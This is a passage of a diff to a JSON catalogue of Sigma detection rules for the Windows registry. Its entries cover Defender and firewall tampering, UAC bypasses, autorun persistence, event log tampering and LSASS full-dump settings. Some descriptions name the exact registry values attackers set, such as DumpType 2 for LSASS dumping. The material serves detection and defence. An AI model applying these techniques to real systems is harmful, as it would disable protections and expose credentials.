"registry_set_policies_attachments_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "value": "Modify Attachment Manager Settings - Attachments" }, { "description": "Detects the Setting of Windows Defender Exclusions", @@ -20307,170 +13964,8534 @@ "falsepositive": [ "Administrator actions" ], - "filename": "win_defender_exclusions.yml", + "filename": "registry_set_defender_exclusions.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/_nullbind/status/1204923340810543109", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "value": "Windows Defender Exclusions Added" + "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "value": "Windows Defender Exclusions Added - Registry" }, { - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "meta": { + "author": "frack113", + "creation_date": "2022/09/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_change_winevt_channelaccess.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "value": "Change Winevt Event Access Permission Via Registry" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "value": "WinSock2 Autorun Keys Modification" + }, + { + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/04", + "falsepositive": [ + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + ], + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "value": "Disabled Windows Defender Eventlog" + }, + { + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_windows_firewall.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", + "value": "Disable Windows Firewall by Registry" + }, + { + "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_hidden_user.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", + "value": "User Account Hidden By Registry" + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_mal_blue_mockingbird.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ] + }, + "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", + "value": "Blue Mockingbird - Registry" + }, + { + "description": "Detect the creation of a service with a service binary located in a uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_creation_service_uncommon_folder.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", + "value": "Service Binary in Uncommon Folder" + }, + { + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_change_rdp_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", + "value": "Changing RDP Port to Non Standard Number" + }, + { + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "meta": { + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_windows_defender_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", + "value": "Disable Windows Defender Functionalities Via Registry Keys" + }, + { + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_install_root_or_ca_certificat.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "d223b46b-5621-4037-88fe-fda32eead684", + "value": "New Root or CA or AuthRoot Certificate to Store" + }, + { + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "meta": { + "author": "Omer Yampel, Christian Burkard", + "creation_date": "2017/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "5b872a46-3b90-45c1-8419-f675db8053aa", + "value": "UAC Bypass via Sdclt" + }, + { + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hhctrl_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/hhctrl.html", + "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "value": "Persistence Via Hhctrl.ocx" + }, + { + "description": "Detects the modification of the registry to disable a system restore on the computer", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_system_restore.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", + "value": "Registry Disable System Restore" + }, + { + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "meta": { + "author": "Lednyov Alexey, oscd.community, Sreeman", + "creation_date": "2020/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_telemetry_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "value": "Potential Registry Persistence Attempt Via Windows Telemetry" + }, + { + "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", + "meta": { + "author": "@ScoubiMtl", + "creation_date": "2021/04/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_outlook_c2_registry_key.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ] + }, + "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "value": "Outlook C2 Registry Key" + }, + { + "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_logging_disabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "value": "PowerShell Logging Disabled" + }, + { + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate use of the multi session functionality" + ], + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "value": "Winlogon AllowMultipleTSSessions Enable" + }, + { + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disallowrun_execution.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "value": "Add DisallowRun Execution to Registry" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_change_security_zones.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", + "value": "IE Change Domain Zone" + }, + { + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" + }, + { + "description": "Detects UAC bypass method using Windows event viewer", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" + ] + }, + "uuid": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "value": "UAC Bypass via Event Viewer - Registry Set" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", + "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "value": "CurrentControlSet Autorun Keys Modification" + }, + { + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "meta": { + "author": "D3F7A5105", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_evtx_file_key_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "value": "Potential EventLog File Location Tampering" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "filename": "registry_set_aedebug_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://persistence-info.github.io/Data/aedebug.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "092af964-4233-4373-b4ba-d86ea2890288", + "value": "Add Debugger Entry To AeDebug For Persistence" + }, + { + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2022/08/05", "falsepositive": [ "Unlikely" ], - "filename": "win_defender_exploit_guard_tamper.yml", + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "value": "Windows Defender Exploit Guard Tamper" - }, - { - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "meta": { - "author": "Cian Heasley", - "creation_date": "2020/08/13", - "falsepositive": [ - "Deletion of Defender malware detections history for legitimate reasons" - ], - "filename": "win_defender_history_delete.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ] - }, - "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", - "value": "Windows Defender Malware Detection History Deletion" - }, - { - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/07/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_defender_psexec_wmi_asr.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", - "https://twitter.com/duff22b/status/1280166329660497920", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" - ] - }, - "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "value": "PSExec and WMI Process Creations Block" - }, - { - "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/05", - "falsepositive": [ - "Administrator actions" - ], - "filename": "win_defender_tamper_protection_trigger.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", - "value": "Microsoft Defender Tamper Protection Trigger" + "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "value": "Suspicious Application Allowed Through Exploit Guard" }, { - "description": "Detects all actions taken by Windows Defender malware detection engines", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { - "author": "Ján Trenčanský", - "creation_date": "2020/07/28", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "value": "System Scripts Autorun Keys Modification" + }, + { + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "meta": { + "author": "@pbssubhash", + "creation_date": "2022/12/08", + "falsepositive": [ + "Legitimate application that needs to do a full dump of their process" + ], + "filename": "registry_set_lsass_usermode_dumping.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "value": "Lsass Full Dump Request Via DumpType Registry Settings" + }, + { + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dhcp_calloutdll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + 